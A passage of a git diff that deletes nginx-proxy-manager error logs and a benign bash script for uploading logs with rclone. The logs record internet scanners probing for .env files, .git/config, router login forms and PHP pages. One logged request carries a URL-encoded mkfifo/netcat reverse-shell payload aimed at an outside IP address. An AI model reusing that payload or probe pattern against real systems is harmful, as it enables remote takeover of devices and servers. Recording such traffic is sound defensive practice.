No such file or directory), client: 10.89.0.8, server: localhost-nginx-proxy-manager, request: "GET /systembc/password.php HTTP/1.1", host: "172.237.28.60" -2025/09/10 21:17:23 [error] 4873#4873: *6199 open() "/var/www/html/password.php" failed (2: No such file or directory), client: 10.89.0.8, server: localhost-nginx-proxy-manager, request: "GET /password.php HTTP/1.1", host: "172.237.28.60" -2025/09/10 21:35:57 [alert] 4873#4873: *7212 512 worker_connections are not enough while connecting to upstream, client: 127.0.0.1, server: localhost-nginx-proxy-manager, request: "GET /favicon.ico HTTP/1.1", upstream: "http://127.0.0.1:80/favicon.ico", host: "172.237.28.60" -2025/09/10 21:36:08 [error] 4874#4874: *7218 open() "/var/www/html/sitemap.xml" failed (2: No such file or directory), client: 10.89.0.8, server: localhost-nginx-proxy-manager, request: "GET /sitemap.xml HTTP/1.1", host: "172.237.28.60" -2025/09/10 21:37:04 [error] 4874#4874: *7223 open() "/var/www/html/.env" failed (2: No such file or directory), client: 10.89.0.8, server: localhost-nginx-proxy-manager, request: "GET /.env HTTP/1.1", host: "172.237.28.60" -2025/09/10 21:37:04 [error] 4874#4874: *7224 open() "/var/www/html/.git/config" failed (2: No such file or directory), client: 10.89.0.8, server: localhost-nginx-proxy-manager, request: "GET /.git/config HTTP/1.1", host: "172.237.28.60" -2025/09/10 21:51:31 [error] 4873#4873: *7230 open() "/var/www/html/test" failed (2: No such file or directory), client: 10.89.0.8, server: localhost-nginx-proxy-manager, request: "GET http://apiv4.9hits.com/test HTTP/1.1", host: "apiv4.9hits.com" -2025/09/10 22:02:27 [error] 4874#4874: *7235 open() "/var/www/html/.git/config" failed (2: No such file or directory), client: 10.89.0.8, server: localhost-nginx-proxy-manager, request: "GET /.git/config HTTP/1.1", host: "172.237.28.60" -2025/09/10 22:32:52 [error] 4874#4874: *7248 open() "/var/www/html/.git/config" failed (2: No such file or directory), client: 10.89.0.8, server: localhost-nginx-proxy-manager, request: "GET /.git/config HTTP/1.1", host: "172.237.28.60" -2025/09/10 22:37:01 [error] 4874#4874: *7252 open() "/var/www/html/.git/config" failed (2: No such file or directory), client: 10.89.0.8, server: localhost-nginx-proxy-manager, request: "GET /.git/config HTTP/1.1", host: "172.237.28.60" -2025/09/10 22:40:31 [error] 4874#4874: *7254 open() "/var/www/html/.env" failed (2: No such file or directory), client: 10.89.0.8, server: localhost-nginx-proxy-manager, request: "GET /.env HTTP/1.1", host: "172.237.28.60" -2025/09/10 23:03:47 [error] 4873#4873: *7271 open() "/var/www/html/boaform/admin/formLogin" failed (2: No such file or directory), client: 10.89.0.8, server: localhost-nginx-proxy-manager, request: "POST /boaform/admin/formLogin HTTP/1.1", host: "172.237.28.60:80", referrer: "http://172.237.28.60:80/admin/login.asp" -2025/09/10 23:10:38 [error] 4873#4873: *7275 open() "/var/www/html/.git/config" failed (2: No such file or directory), client: 10.89.0.8, server: localhost-nginx-proxy-manager, request: "GET /.git/config HTTP/1.1", host: "172.237.28.60" -2025/09/11 00:11:12 [error] 4873#4873: *7299 open() "/var/www/html/.git/config" failed (2: No such file or directory), client: 10.89.0.8, server: localhost-nginx-proxy-manager, request: "GET /.git/config HTTP/1.1", host: "172.237.28.60" -2025/09/11 00:25:36 [error] 4874#4874: *7315 open() "/var/www/html/.git/config" failed (2: No such file or directory), client: 10.89.0.8, server: localhost-nginx-proxy-manager, request: "GET /.git/config HTTP/1.1", host: "172.237.28.60" -2025/09/11 00:32:19 [error] 4874#4874: *7320 open() "/var/www/html/.git/config" failed (2: No such file or directory), client: 10.89.0.8, server: localhost-nginx-proxy-manager, request: "GET /.git/config HTTP/1.1", host: "172.237.28.60" diff --git a/logs/2025-09-11/npm_error_09:39:21.log b/logs/2025-09-11/npm_error_09:39:21.log deleted file mode 100644 index e1289f2..0000000 --- a/logs/2025-09-11/npm_error_09:39:21.log +++ /dev/null @@ -1,46 +0,0 @@ -2025/09/10 07:27:12 [error] 189#189: *2 open() "/var/www/html/device.rsp" failed (2: No such file or directory), client: 10.89.0.8, server: localhost-nginx-proxy-manager, request: "POST /device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=mkfifo%20%2Ftmp%2Ff%3B%20%2Fbin%2Fsh%20-i%20%3C%20%2Ftmp%2Ff%202%3E%261%20%7C%20nc%20196.251.84.66%206667%20%3E%20%2Ftmp%2Ff HTTP/1.1", host: "172.237.28.60:80" -2025/09/10 08:24:57 [alert] 194#194: *1013 512 worker_connections are not enough while connecting to upstream, client: 127.0.0.1, server: localhost-nginx-proxy-manager, request: "GET /favicon.ico HTTP/1.1", upstream: "http://127.0.0.1:80/favicon.ico", host: "172.237.28.60" -2025/09/10 09:01:08 [error] 195#195: *1018 open() "/var/www/html/login" failed (2: No such file or directory), client: 10.89.0.8, server: localhost-nginx-proxy-manager, request: "GET /login HTTP/1.1", host: "84167165-jh888-17.tcr195p888.com" -2025/09/10 09:34:50 [error] 194#194: *1024 open() "/var/www/html/.env" failed (2: No such file or directory), client: 10.89.0.8, server: localhost-nginx-proxy-manager, request: "GET /.env HTTP/1.1", host: "172.237.28.60" -2025/09/10 09:34:51 [error] 194#194: *1025 open() "/var/www/html/.git/config" failed (2: No such file or directory), client: 10.89.0.8, server: localhost-nginx-proxy-manager, request: "GET /.git/config HTTP/1.1", host: "172.237.28.60" -2025/09/10 09:57:39 [error] 194#194: *1041 open() "/var/www/html/boaform/admin/formLogin" failed (2: No such file or directory), client: 10.89.0.8, server: localhost-nginx-proxy-manager, request: "POST /boaform/admin/formLogin HTTP/1.1", host: "172.237.28.60:80", referrer: "http://172.237.28.60:80/admin/login.asp" -2025/09/10 11:13:47 [alert] 195#195: *2067 512 worker_connections are not enough while connecting to upstream, client: 127.0.0.1, server: localhost-nginx-proxy-manager, request: "GET /favicon.ico HTTP/1.1", upstream: "http://127.0.0.1:80/favicon.ico", host: "172.237.28.60" -2025/09/10 11:13:55 [error] 194#194: *2071 open() "/var/www/html/security.txt" failed (2: No such file or directory), client: 10.89.0.8, server: localhost-nginx-proxy-manager, request: "GET /security.txt HTTP/1.1", host: "172.237.28.60" -2025/09/10 11:30:45 [error] 194#194: *2080 open() "/var/www/html/portal/redlion" failed (2: No such file or directory), client: 10.89.0.8, server: localhost-nginx-proxy-manager, request: "GET /portal/redlion HTTP/1.1", host: "172.237.28.60" -2025/09/10 12:25:02 [error] 194#194: *2096 "/var/www/html/webui/index.html" is not found (2: No such file or directory), client: 10.89.0.8, server: localhost-nginx-proxy-manager, request: "GET /webui/ HTTP/1.1", host: "172.237.28.60" -2025/09/10 12:26:26 [alert] 194#194: *3016 512 worker_connections are not enough while connecting to upstream, client: 127.0.0.1, server: localhost-nginx-proxy-manager, request: "GET /favicon.ico HTTP/1.1", upstream: "http://127.0.0.1:80/favicon.ico", host: "172.237.28.60" -2025/09/10 12:26:51 [error] 195#195: *3017 "/var/www/html/geoserver/web/index.html" is not found (2: No such file or directory), client: 10.89.0.8, server: localhost-nginx-proxy-manager, request: "GET /geoserver/web/ HTTP/1.1", host: "172.237.28.60" -2025/09/10 13:23:16 [error] 194#194: *3022 open() "/var/www/html/actuator/health" failed (2: No such file or directory), client: 10.89.0.8, server: localhost-nginx-proxy-manager, request: "GET /actuator/health HTTP/1.1", host: "172.237.28.60" -2025/09/10 13:47:48 [error] 2460#2460: *3029 open() "/var/www/html/boaform/admin/formLogin" failed (2: No such file or directory), client: 10.89.0.8, server: localhost-nginx-proxy-manager, request: "POST /boaform/admin/formLogin HTTP/1.1", host: "172.237.28.60:80", referrer: "http://172.237.28.60:80/admin/login.asp" -2025/09/10 16:00:23 [error] 2460#2460: *3048 open() "/var/www/html/boaform/admin/formLogin" failed (2: No such file or directory), client: 10.89.0.8, server: localhost-nginx-proxy-manager, request: "POST /boaform/admin/formLogin HTTP/1.1", host: "172.237.28.60:80", referrer: "http://172.237.28.60:80/admin/login.asp" -2025/09/10 16:59:43 [error] 2460#2460: *3071 open() "/var/www/html/.env" failed (2: No such file or directory), client: 10.89.0.8, server: localhost-nginx-proxy-manager, request: "GET /.env HTTP/1.1", host: "172.237.28.60" -2025/09/10 18:33:41 [alert] 2461#2461: *4114 512 worker_connections are not enough while connecting to upstream, client: 127.0.0.1, server: localhost-nginx-proxy-manager, request: "GET /favicon.ico HTTP/1.1", upstream: "http://127.0.0.1:80/favicon.ico", host: "172.237.28.60" -2025/09/10 18:33:55 [error] 2460#2460: *4118 open() "/var/www/html/sitemap.xml" failed (2: No such file or directory), client: 10.89.0.8, server: localhost-nginx-proxy-manager, request: "GET /sitemap.xml HTTP/1.1", host: "172.237.28.60" -2025/09/10 19:31:44 [error] 2460#2460: *4130 open() "/var/www/html/boaform/admin/formLogin" failed (2: No such file or directory), client: 10.89.0.8, server: localhost-nginx-proxy-manager, request: "POST /boaform/admin/formLogin HTTP/1.1", host: "172.237.28.60:80", referrer: "http://172.237.28.60:80/admin/login.asp" -2025/09/10 19:41:47 [alert] 4873#4873: *5146 512 worker_connections are not enough while connecting to upstream, client: 127.0.0.1, server: localhost-nginx-proxy-manager, request: "GET /favicon.ico HTTP/1.1", upstream: "http://127.0.0.1:80/favicon.ico", host: "172.237.28.60" -2025/09/10 19:51:44 [error] 4873#4873: *5154 open() "/var/www/html/security.txt" failed (2: No such file or directory), client: 10.89.0.8, server: localhost-nginx-proxy-manager, request: "GET /security.txt HTTP/1.1", host: "172.237.28.60" -2025/09/10 20:06:06 [error] 4874#4874: *5157 open() "/var/www/html/.env" failed (2: No such file or directory), client: 10.89.0.8, server: localhost-nginx-proxy-manager, request: "GET /.env HTTP/1.1", host: "172.237.28.60" -2025/09/10 20:18:50 [error] 4874#4874: *5159 open() "/var/www/html/boaform/admin/formLogin" failed (2: No such file or directory), client: 10.89.0.8, server: localhost-nginx-proxy-manager, request: "POST /boaform/admin/formLogin HTTP/1.1", host: "172.237.28.60:80", referrer: "http://172.237.28.60:80/admin/login.asp" -2025/09/10 20:26:46 [error] 4874#4874: *5170 open() "/var/www/html/.env" failed (2: No such file or directory), client: 10.89.0.8, server: localhost-nginx-proxy-manager, request: "GET /.env HTTP/1.1", host: "172.237.28.60" -2025/09/10 21:17:22 [error] 4874#4874: *5180 open() "/var/www/html/form.html" failed (2: No such file or directory), client: 10.89.0.8, server: localhost-nginx-proxy-manager, request: "GET /form.html HTTP/1.1", host: "172.237.28.60" -2025/09/10 21:17:22 [error] 4874#4874: *5181 open() "/var/www/html/upl.php" failed (2: No such file or directory), client: 10.89.0.8, server: localhost-nginx-proxy-manager, request: "GET /upl.php HTTP/1.1", host: "172.237.28.60" -2025/09/10 21:17:22 [error] 4874#4874: *5182 open() "/var/www/html/t4" failed (2: No such file or directory), client: 10.89.0.8, server: localhost-nginx-proxy-manager, request: "GET /t4 HTTP/1.1", host: "172.237.28.60" -2025/09/10 21:17:22 [error] 4874#4874: *5183 "/var/www/html/geoip/index.html" is not found (2: No such file or directory), client: 10.89.0.8, server: localhost-nginx-proxy-manager, request: "GET /geoip/ HTTP/1.1", host: "172.237.28.60" -2025/09/10 21:17:23 [alert] 4874#4874: *6196 512 worker_connections are not enough while connecting to upstream, client: 127.0.0.1, server: localhost-nginx-proxy-manager, request: "GET /favicon.ico HTTP/1.1", upstream: "http://127.0.0.1:80/favicon.ico", host: "172.237.28.60" -2025/09/10 21:17:23 [error] 4873#4873: *6197 open() "/var/www/html/1.php" failed (2: No such file or directory), client: 10.89.0.8, server: localhost-nginx-proxy-manager, request: "GET /1.php HTTP/1.1", host: "172.237.28.60" -2025/09/10 21:17:23 [error] 4873#4873: *6198 open() "/var/www/html/systembc/password.php" failed (2: No such file or directory), client: 10.89.0.8, server: localhost-nginx-proxy-manager, request: "GET /systembc/password.php HTTP/1.1", host: "172.237.28.60" -2025/09/10 21:17:23 [error] 4873#4873: *6199 open() "/var/www/html/password.php" failed (2: No such file or directory), client: 10.89.0.8, server: localhost-nginx-proxy-manager, request: "GET /password.php HTTP/1.1", host: "172.237.28.60" -2025/09/10 21:35:57 [alert] 4873#4873: *7212 512 worker_connections are not enough while connecting to upstream, client: 127.0.0.1, server: localhost-nginx-proxy-manager, request: "GET /favicon.ico HTTP/1.1", upstream: "http://127.0.0.1:80/favicon.ico", host: "172.237.28.60" -2025/09/10 21:36:08 [error] 4874#4874: *7218 open() "/var/www/html/sitemap.xml" failed (2: No such file or directory), client: 10.89.0.8, server: localhost-nginx-proxy-manager, request: "GET /sitemap.xml HTTP/1.1", host: "172.237.28.60" -2025/09/10 21:37:04 [error] 4874#4874: *7223 open() "/var/www/html/.env" failed (2: No such file or directory), client: 10.89.0.8, server: localhost-nginx-proxy-manager, request: "GET /.env HTTP/1.1", host: "172.237.28.60" -2025/09/10 21:37:04 [error] 4874#4874: *7224 open() "/var/www/html/.git/config" failed (2: No such file or directory), client: 10.89.0.8, server: localhost-nginx-proxy-manager, request: "GET /.git/config HTTP/1.1", host: "172.237.28.60" -2025/09/10 21:51:31 [error] 4873#4873: *7230 open() "/var/www/html/test" failed (2: No such file or directory), client: 10.89.0.8, server: localhost-nginx-proxy-manager, request: "GET http://apiv4.9hits.com/test HTTP/1.1", host: "apiv4.9hits.com" -2025/09/10 22:02:27 [error] 4874#4874: *7235 open() "/var/www/html/.git/config" failed (2: No such file or directory), client: 10.89.0.8, server: localhost-nginx-proxy-manager, request: "GET /.git/config HTTP/1.1", host: "172.237.28.60" -2025/09/10 22:32:52 [error] 4874#4874: *7248 open() "/var/www/html/.git/config" failed (2: No such file or directory), client: 10.89.0.8, server: localhost-nginx-proxy-manager, request: "GET /.git/config HTTP/1.1", host: "172.237.28.60" -2025/09/10 22:37:01 [error] 4874#4874: *7252 open() "/var/www/html/.git/config" failed (2: No such file or directory), client: 10.89.0.8, server: localhost-nginx-proxy-manager, request: "GET /.git/config HTTP/1.1", host: "172.237.28.60" -2025/09/10 22:40:31 [error] 4874#4874: *7254 open() "/var/www/html/.env" failed (2: No such file or directory), client: 10.89.0.8, server: localhost-nginx-proxy-manager, request: "GET /.env HTTP/1.1", host: "172.237.28.60" -2025/09/10 23:03:47 [error] 4873#4873: *7271 open() "/var/www/html/boaform/admin/formLogin" failed (2: No such file or directory), client: 10.89.0.8, server: localhost-nginx-proxy-manager, request: "POST /boaform/admin/formLogin HTTP/1.1", host: "172.237.28.60:80", referrer: "http://172.237.28.60:80/admin/login.asp" -2025/09/10 23:10:38 [error] 4873#4873: *7275 open() "/var/www/html/.git/config" failed (2: No such file or directory), client: 10.89.0.8, server: localhost-nginx-proxy-manager, request: "GET /.git/config HTTP/1.1", host: "172.237.28.60" -2025/09/11 00:11:12 [error] 4873#4873: *7299 open() "/var/www/html/.git/config" failed (2: No such file or directory), client: 10.89.0.8, server: localhost-nginx-proxy-manager, request: "GET /.git/config HTTP/1.1", host: "172.237.28.60" -2025/09/11 00:25:36 [error] 4874#4874: *7315 open() "/var/www/html/.git/config" failed (2: No such file or directory), client: 10.89.0.8, server: localhost-nginx-proxy-manager, request: "GET /.git/config HTTP/1.1", host: "172.237.28.60" -2025/09/11 00:32:19 [error] 4874#4874: *7320 open() "/var/www/html/.git/config" failed (2: No such file or directory), client: 10.89.0.8, server: localhost-nginx-proxy-manager, request: "GET /.git/config HTTP/1.1", host: "172.237.28.60" diff --git a/upload_log_file_fixed.sh b/upload_log_file_fixed.sh deleted file mode 100644 index c0a5cdd..0000000 --- a/upload_log_file_fixed.sh +++ /dev/null @@ -1,171 +0,0 @@ -#!/bin/bash - -# Fixed upload_log_file function with proper error handling -upload_log_file() { - local source_file="$1" - local dest_path="$2" - local max_retries="${3:-3}" - local retry_delay="${4:-5}" - - # Validate input parameters - if [[ -z "$source_file" || -z "$dest_path" ]]; then - echo "ERROR: Missing required parameters. Usage: upload_log_file [max_retries] [retry_delay]" >&2 - return 1 - fi - - # Check if source file exists - if [[ ! -f "$source_file" ]]; then - echo "ERROR: Source file '$source_file' does not exist" >&2 - return 1 - fi - - local retry_count=0 - local upload_success=false - - echo "Starting upload: $source_file -> $dest_path" - - while [[ $retry_count -lt $max_retries ]] && [[ "$upload_success" = false ]]; do - if [[ $retry_count -gt 0 ]]; then - echo "Retry attempt $retry_count of $max_retries after ${retry_delay}s delay..." - sleep "$retry_delay" - fi - - echo "Uploading $(basename "$source_file") (attempt $((retry_count + 1))/$max_retries)..." - - # Create temporary files for capturing output - local stdout_file=$(mktemp) - local stderr_file=$(mktemp) - - # Run rclone copyto and capture both stdout and stderr - # The exit code is the most reliable indicator of success/failure - if rclone copyto "$source_file" "$dest_path" \ - --config="${RCLONE_CONFIG:-$HOME/.config/rclone/rclone.conf}" \ - --progress \ - --stats=1s \ - --stats-one-line \ - --retries=1 \ - --low-level-retries=1 \ - --timeout=300s \ - --contimeout=60s \ - > "$stdout_file" 2> "$stderr_file"; then - - # rclone exited with code 0 - success - upload_success=true - echo "✅ Upload successful: $(basename "$source_file")" - - # Optional: Show final transfer stats if available - if [[ -s "$stdout_file" ]]; then - local last_line=$(tail -n1 "$stdout_file") - if [[ "$last_line" =~ Transferred ]]; then - echo "📊 $last_line" - fi - fi - - else - # rclone exited with non-zero code - failure - local exit_code=$? - echo "❌ Upload failed with exit code: $exit_code" - - # Show error details - if [[ -s "$stderr_file" ]]; then - echo "Error details:" - cat "$stderr_file" | head -10 # Limit error output - fi - - # Show last few lines of stdout for context - if [[ -s "$stdout_file" ]]; then - echo "Last output:" - tail -n3 "$stdout_file" - fi - - retry_count=$((retry_count + 1)) - fi - - # Clean up temporary files - rm -f "$stdout_file" "$stderr_file" - done - - if [[ "$upload_success" = true ]]; then - echo "🎉 Final result: Upload completed successfully" - return 0 - else - echo "💥 Final result: Upload failed after $max_retries attempts" - return 1 - fi -} - -# Alternative minimal version focused only on exit code checking -upload_log_file_minimal() { - local source_file="$1" - local dest_path="$2" - - echo "Uploading $(basename "$source_file")..." - - # Simple approach: rely solely on rclone's exit code - # Suppress progress output to avoid confusion - if rclone copyto "$source_file" "$dest_path" \ - --config="${RCLONE_CONFIG:-$HOME/.config/rclone/rclone.conf}" \ - --retries=2 \ - --timeout=300s \ - --quiet; then - echo "✅ Upload successful: $(basename "$source_file")" - return 0 - else - local exit_code=$? - echo "❌ Upload failed with exit code: $exit_code" - return $exit_code - fi -} - -# Example usage function showing proper error handling in monitoring loop -monitor_and_upload_logs() { - local log_directory="$1" - local remote_path="$2" - - while true; do - # Find log files to upload - local files_to_upload=($(find "$log_directory" -name "*.log" -type f -mmin +1)) - - for log_file in "${files_to_upload[@]}"; do - local filename=$(basename "$log_file") - local dest_path="$remote_path/$filename" - - # Use the fixed upload function - if upload_log_file "$log_file" "$dest_path"; then - echo "Successfully uploaded $filename, moving to processed/" - mkdir -p "$log_directory/processed" - mv "$log_file" "$log_directory/processed/" - else - echo "Failed to upload $filename, will retry next cycle" - # Don't exit the monitoring loop on upload failure - # The file will be retried in the next cycle - fi - done - - # Wait before next check - sleep 60 - done -} - -# Test function to validate rclone configuration -test_rclone_upload() { - local test_file=$(mktemp) - echo "test upload $(date)" > "$test_file" - - echo "Testing rclone upload functionality..." - if upload_log_file "$test_file" "r2:your-bucket/test/test_$(date +%s).txt"; then - echo "✅ rclone upload test passed" - rm -f "$test_file" - return 0 - else - echo "❌ rclone upload test failed" - rm -f "$test_file" - return 1 - fi -} - -# If script is run directly, run test -if [[ "${BASH_SOURCE[0]}" == "${0}" ]]; then - echo "Running rclone upload test..." - test_rclone_upload -fi \ No newline at end of file